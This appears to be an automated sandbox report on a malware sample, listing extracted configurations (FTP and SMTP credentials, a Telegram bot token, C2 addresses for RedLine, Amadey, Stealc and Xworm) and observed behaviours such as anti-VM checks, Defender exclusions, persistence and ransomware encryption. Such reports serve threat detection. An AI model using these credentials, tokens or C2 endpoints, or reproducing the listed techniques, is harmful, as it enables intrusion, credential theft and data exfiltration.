agenttesla | b434527e3f55425dc624118395ee28b4725e81464863dfd15d175dd74fbd9a6a

Resubmissions

02-09-2024 02:19

240902-crxs1syfmm 10

07-07-2024 21:02

240707-zvllgsyaqp 10

01-07-2024 21:37

240701-1gjemsverk 10

Analysis

max time kernel
277s
max time network
1022s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
01-07-2024 21:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
45.200.236.2
Port:
21
Username:
user
Password:
123qwe

Extracted

Credentials

Protocol: ftp
Host:
69.12.91.6
Port:
21
Username:
ftp
Password:
computer

Extracted

Credentials

Protocol: ftp
Host:
162.218.51.12
Port:
21
Username:
admin
Password:
987654321

Extracted

Credentials

Protocol: ftp
Host:
145.14.156.14
Port:
21
Username:
user
Password:
demo

Extracted

Credentials

Protocol: ftp
Host:
167.114.113.16
Port:
21
Username:
root
Password:
1342

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffoc

4.185.56.82:42687

Extracted

Family

redline

Botnet

newlogs

85.28.47.7:17210

Extracted

Family

stealc

Botnet

ZOV

http://40.86.87.10

Attributes

url_path
/108e010e8f91c38c.php

Extracted

Family

redline

Botnet

newbuild

185.215.113.67:40960

Extracted

Family

redline

Botnet

666

195.20.16.103:18305

Extracted

Family

xworm

127.0.0.1:7000

beshomandotestbesnd.run.place:7000

Attributes

Install_directory
%ProgramData%
install_file
cmd.exe
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Extracted

Family

xworm

Version

5.0

64.226.123.178:6098

Mutex

1z0ENxCLSR3XRSre

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
cp8nl.hyperhost.ua
Port:
587
Username:
[email protected]
Password:
vqpF.#QRT234
Email To:
[email protected]

Extracted

Family

gurcu

https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Neshta payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000300000002b9d4-31123.dat	family_neshta

Detect Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/files/0x000200000002aa53-765.dat	family_vidar_v7

Detect Xehook Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000200000002b9df-31599.dat	family_xehook

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2780-4662-0x0000000000400000-0x0000000000418000-memory.dmp	family_xworm
behavioral1/memory/7036-27381-0x0000000000400000-0x0000000000436000-memory.dmp	family_xworm
behavioral1/files/0x000100000002b9b7-30725.dat	family_xworm
behavioral1/files/0x000200000002b9e4-31726.dat	family_xworm

Detects HijackLoader (aka IDAT Loader) 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000300000002b90f-28971.dat	family_hijackloader

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
loader hijackloader
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Phorphiex payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000500000002ba03-32325.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1004-684-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral1/files/0x000100000002aa9c-689.dat	family_redline
behavioral1/memory/1636-701-0x0000000000B60000-0x0000000000BB0000-memory.dmp	family_redline
behavioral1/files/0x000100000002aaaa-739.dat	family_redline
behavioral1/memory/5040-756-0x0000000000810000-0x0000000000860000-memory.dmp	family_redline
behavioral1/memory/1356-870-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2424-2334-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat

Stealc
Stealc is an infostealer written in C++.
stealer stealc
TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
ransomware targetcompany
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Xehook stealer
Xehook is an infostealer written in C#.
stealer xehook
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Contacts a large (2194) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplong.exeaxplong.exes.exerandom.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	s.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

Processes:

bcdedit.exebcdedit.exe

pid	Process
1092	bcdedit.exe
4544	bcdedit.exe

Nirsoft 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4752-61-0x0000000000400000-0x000000000041C000-memory.dmp	Nirsoft
behavioral1/memory/4752-182-0x0000000000400000-0x000000000041C000-memory.dmp	Nirsoft

Renames multiple (7041) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000500000002b8d1-27834.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePowershell.exepowershell.exe

pid	Process
3156	powershell.exe
3936	powershell.exe
6016	powershell.exe
6712	powershell.exe
7548	powershell.exe
3544	powershell.exe
4908	powershell.exe
3328	powershell.exe
6156	powershell.exe
4472	powershell.exe
7536	powershell.exe
6284	powershell.exe
6444	powershell.exe
1920	powershell.exe
5840	powershell.exe
6156	powershell.exe
4448	Powershell.exe
1228	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

Processes:

installer2.exe

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	installer2.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 4 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/files/0x000100000002aa51-275.dat	net_reactor
behavioral1/memory/2756-282-0x0000000000040000-0x0000000000362000-memory.dmp	net_reactor
behavioral1/files/0x000400000002aaad-810.dat	net_reactor
behavioral1/memory/1916-815-0x00000000000E0000-0x000000000064C000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

s.exeaxplong.exeaxplong.exerandom.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	s.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	s.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Drops startup file 3 IoCs

Processes:

Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exeIerLRtXpEcMnUjz.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome sandbox.exe.lnk	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.lnk	IerLRtXpEcMnUjz.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.lnk	IerLRtXpEcMnUjz.exe

Executes dropped EXE 56 IoCs

Processes:

w.exes.exeGoogle%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exenircmd.exeluma22222.exeOpolis.exexcdaxfszx.exedrivermanager.exerandom.exenewfile_setup.exeaxplong.exeOSM-Client.exeaxplong.exestreamer.exeTpWWMUpe0LEV.exeFreshbuild.execrypt6.exeHkbsse.exenewlogs.exestealc_zov.exe1.exenewbuild.exevi.exehv.exeM5traider.exenewbild.exeIerLRtXpEcMnUjz.exeld.exeIerLRtXpEcMnUjz.exeHkbsse.exeaxplong.exenewpinf.exeHkbsse.exeaxplong.execmd.exenn.exenn.execmd.exejet.exelumma1234.exehellminer.exehellminer.exehellminer.exeHkbsse.execmd.exeaxplong.exeama.exemimikatz.exetwapcdhuj20shds2WOP90sdhy.exechisel.execmd.exeinstaller2.exeputty.exeWindowsAutHostuxtldsktkgfv.exePirate_24S.exe

pid	Process
2608	w.exe
2452	s.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
4752	nircmd.exe
4264	luma22222.exe
3808	Opolis.exe
2752	xcdaxfszx.exe
560	drivermanager.exe
4936	random.exe
2756	newfile_setup.exe
3908	axplong.exe
2732	OSM-Client.exe
1448	axplong.exe
4656	streamer.exe
3984	TpWWMUpe0LEV.exe
4588	Freshbuild.exe
1064	crypt6.exe
1592	Hkbsse.exe
1636	newlogs.exe
2480	stealc_zov.exe
3628	1.exe
5040	newbuild.exe
2888	vi.exe
1916	hv.exe
4608	M5traider.exe
3032	newbild.exe
2776	IerLRtXpEcMnUjz.exe
2288	ld.exe
2780	IerLRtXpEcMnUjz.exe
5556	Hkbsse.exe
5168	axplong.exe
6380	newpinf.exe
7108	Hkbsse.exe
4940	axplong.exe
5992	cmd.exe
5964	nn.exe
7036	nn.exe
6540	cmd.exe
5900	jet.exe
6036	lumma1234.exe
3420	hellminer.exe
6556	hellminer.exe
6088	hellminer.exe
5588	Hkbsse.exe
4552	cmd.exe
6124	axplong.exe
5896	ama.exe
5884	mimikatz.exe
5452	twapcdhuj20shds2WOP90sdhy.exe
5512	chisel.exe
3024	cmd.exe
6172	installer2.exe
5852	putty.exe
6324	WindowsAutHost
5212	uxtldsktkgfv.exe
3956	Pirate_24S.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Wine	axplong.exe

Loads dropped DLL 64 IoCs

Processes:

xcdaxfszx.exeOSM-Client.exeTpWWMUpe0LEV.exeM5traider.exehv.exejet.exestealc_zov.exe

pid	Process
2752	xcdaxfszx.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
2732	OSM-Client.exe
3984	TpWWMUpe0LEV.exe
4608	M5traider.exe
1916	hv.exe
5900	jet.exe
5900	jet.exe
2480	stealc_zov.exe
2480	stealc_zov.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/files/0x000200000002aa43-18.dat	themida
behavioral1/memory/2452-45-0x00000000004D0000-0x0000000000E34000-memory.dmp	themida
behavioral1/memory/2452-46-0x00000000004D0000-0x0000000000E34000-memory.dmp	themida
behavioral1/files/0x000200000002b9ee-32027.dat	themida

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000200000002aa44-55.dat	upx
behavioral1/memory/4752-61-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral1/memory/4752-182-0x0000000000400000-0x000000000041C000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/files/0x000200000002b9ef-31821.dat	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

IerLRtXpEcMnUjz.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "C:\\ProgramData\\cmd.exe"	IerLRtXpEcMnUjz.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

s.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	s.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ld.exe

description	ioc	Process
File opened (read-only)	\??\E:	ld.exe
File opened (read-only)	\??\J:	ld.exe
File opened (read-only)	\??\T:	ld.exe
File opened (read-only)	\??\U:	ld.exe
File opened (read-only)	\??\V:	ld.exe
File opened (read-only)	\??\W:	ld.exe
File opened (read-only)	\??\D:	ld.exe
File opened (read-only)	\??\A:	ld.exe
File opened (read-only)	\??\G:	ld.exe
File opened (read-only)	\??\L:	ld.exe
File opened (read-only)	\??\R:	ld.exe
File opened (read-only)	\??\Z:	ld.exe
File opened (read-only)	\??\O:	ld.exe
File opened (read-only)	\??\Q:	ld.exe
File opened (read-only)	\??\S:	ld.exe
File opened (read-only)	\??\B:	ld.exe
File opened (read-only)	\??\H:	ld.exe
File opened (read-only)	\??\K:	ld.exe
File opened (read-only)	\??\M:	ld.exe
File opened (read-only)	\??\N:	ld.exe
File opened (read-only)	\??\Y:	ld.exe
File opened (read-only)	\??\I:	ld.exe
File opened (read-only)	\??\P:	ld.exe
File opened (read-only)	\??\X:	ld.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 33 IoCs

Web Service

T1102

Processes:

flow	ioc
241	raw.githubusercontent.com
356	raw.githubusercontent.com
1732	iplogger.com
1961	raw.githubusercontent.com
2325	pastebin.com
196	pastebin.com
216	pastebin.com
383	pastebin.com
26	bitbucket.org
96	pastebin.com
139	pastebin.com
238	pastebin.com
4	raw.githubusercontent.com
4	pastebin.com
54	bitbucket.org
432	pastebin.com
2611	pastebin.com
14	bitbucket.org
145	raw.githubusercontent.com
355	pastebin.com
739	pastebin.com
1737	pastebin.com
1213	pastebin.com
1626	pastebin.com
11	raw.githubusercontent.com
242	raw.githubusercontent.com
243	bitbucket.org
738	pastebin.com
1733	iplogger.com
148	pastebin.com
241	bitbucket.org
275	pastebin.com
313	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
64	api.ipify.org
1954	ip-api.com

Power Settings 1 TTPs 12 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
2696	powercfg.exe
5436	powercfg.exe
4156	powercfg.exe
2144	powercfg.exe
6368	cmd.exe
2480	powercfg.exe
5604	powercfg.exe
7132	powercfg.exe
6528	powercfg.exe
6220	powercfg.exe
3920	powercfg.exe
4440	powercfg.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/files/0x000400000002b8df-27843.dat	autoit_exe
behavioral1/files/0x000200000002b982-29603.dat	autoit_exe

Drops file in System32 directory 1 IoCs

Processes:

installer2.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	installer2.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

Processes:

s.exerandom.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeinstaller2.exeWindowsAutHost

pid	Process
2452	s.exe
4936	random.exe
3908	axplong.exe
1448	axplong.exe
5168	axplong.exe
4940	axplong.exe
6124	axplong.exe
6172	installer2.exe
6172	installer2.exe
6324	WindowsAutHost
6324	WindowsAutHost

Suspicious use of SetThreadContext 17 IoCs

Processes:

xcdaxfszx.exedrivermanager.exenewfile_setup.exeTpWWMUpe0LEV.execrypt6.exestreamer.exeM5traider.exehv.exeIerLRtXpEcMnUjz.exenn.execmd.exelumma1234.exetwapcdhuj20shds2WOP90sdhy.execmd.exeinstaller2.exeuxtldsktkgfv.exe

description	pid	Process	procid_target
PID 2752 set thread context of 1104	2752	xcdaxfszx.exe	92
PID 560 set thread context of 3336	560	drivermanager.exe	95
PID 2756 set thread context of 2956	2756	newfile_setup.exe	101
PID 3984 set thread context of 4032	3984	TpWWMUpe0LEV.exe	109
PID 1064 set thread context of 1004	1064	crypt6.exe	116
PID 4656 set thread context of 2036	4656	streamer.exe	131
PID 4608 set thread context of 1356	4608	M5traider.exe	132
PID 1916 set thread context of 2424	1916	hv.exe	145
PID 2776 set thread context of 2780	2776	IerLRtXpEcMnUjz.exe	154
PID 5964 set thread context of 7036	5964	nn.exe	173
PID 5992 set thread context of 6540	5992	cmd.exe	183
PID 6036 set thread context of 728	6036	lumma1234.exe	187
PID 5452 set thread context of 6280	5452	twapcdhuj20shds2WOP90sdhy.exe	205
PID 4552 set thread context of 3024	4552	cmd.exe	214
PID 6172 set thread context of 5548	6172	installer2.exe	238
PID 5212 set thread context of 5784	5212	uxtldsktkgfv.exe	263
PID 5212 set thread context of 2632	5212	uxtldsktkgfv.exe	264

Drops file in Program Files directory 64 IoCs

Processes:

ld.exe

description	ioc	Process
File created	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\TCUI-Toolkit\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\QUERIES\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\view.html	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WeatherSplashScreen.scale-200_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Icons\StickyNotesLargeTile.scale-125_altform-colorful_theme-light.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Exchange.scale-100.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Resources\Fonts\SegMVR2.ttf	ld.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\x64\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js	ld.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cy\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeWideTile.scale-125.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-125.png	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\HOW TO BACK FILES.txt	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\NewsWideTile.scale-125_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\WorkingElsewhere.scale-150_contrast-black.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_link_18.svg	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\illustrations.png	ld.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\server\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Dark.scale-400.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Assets\contrast-black\FeedbackHubAppList.targetsize-80.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-60_altform-unplated.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\components\Dropdown\utilities\DropdownSizePosCache.js	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ui-strings.js	ld.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\Locales\it.pak	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\NewsSplashScreen.scale-100_contrast-black.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\osmmui.msi.16.en-us.tree.dat	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\contrast-white\GetHelpAppList.targetsize-32_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\PowerAutomateAppIcon.scale-150.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforcomments.svg	ld.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-pl.xrm-ms	ld.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LibrarySquare71x71Logo.scale-125.png	ld.exe
